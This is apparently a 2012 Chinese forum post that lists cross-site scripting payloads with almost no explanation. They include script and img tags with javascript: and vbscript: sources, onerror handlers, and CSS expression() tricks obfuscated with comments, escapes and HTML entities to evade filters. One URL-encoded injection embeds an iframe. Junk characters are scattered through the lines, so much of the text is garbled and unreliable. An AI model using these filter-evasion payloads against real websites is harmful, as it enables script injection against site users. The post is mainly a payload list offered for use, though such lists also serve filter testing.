<script>alert("跨站")</script> (最常用)
l4 l3 @/ c- l+ ]) A! u<img scr=javascript:alert("跨站")></img>
4 g/ U8 \ `8 A6 Y/ {- k3 b<img scr="javascript: alert(/跨站/)></img>
X ]; b7 a5 ]7 Z! \<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)) Q, j3 _4 n, }
<img scr="#" onerror=alert(/跨站/)></img>: j# R( \6 `6 q8 R
<img scr="#" style="xss:expression(alert(/xss/));"></img>( r5 H; g% ~5 k: ?- l7 P o* h
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
$ u) i; O! B# [+ @<img src=vbscript:msgbox ("xss")></img>. Z$ z8 E8 v. ]- e# @/ m
<style> input {left:expression (alert('xss'))}</style>9 r2 I, v, H. b6 v% h0 R$ L
<div style={left:expression (alert('xss'))}></div>
$ F$ U9 B+ F7 h/ a<div style={left:exp/* */ression (alert('xss'))}></div>+ b i5 U* |1 I, Y/ }. h
<div style={left:\0065\0078ression (alert('xss'))}></div>
& i# F x$ P2 ?. jhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>5 u- q( C1 k3 R) s0 f
unicode <div style="{left:expRessioN (alert('xss'))}">
( v) h# Y/ f0 [5 H+ `; d' a+ d
5 @8 u5 ]3 ]& W' `* `) k _; K8 G. e"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["1 ?& T* I9 U% H) B
|
发表于 2012-9-13 17:15:04
收藏
支持
反对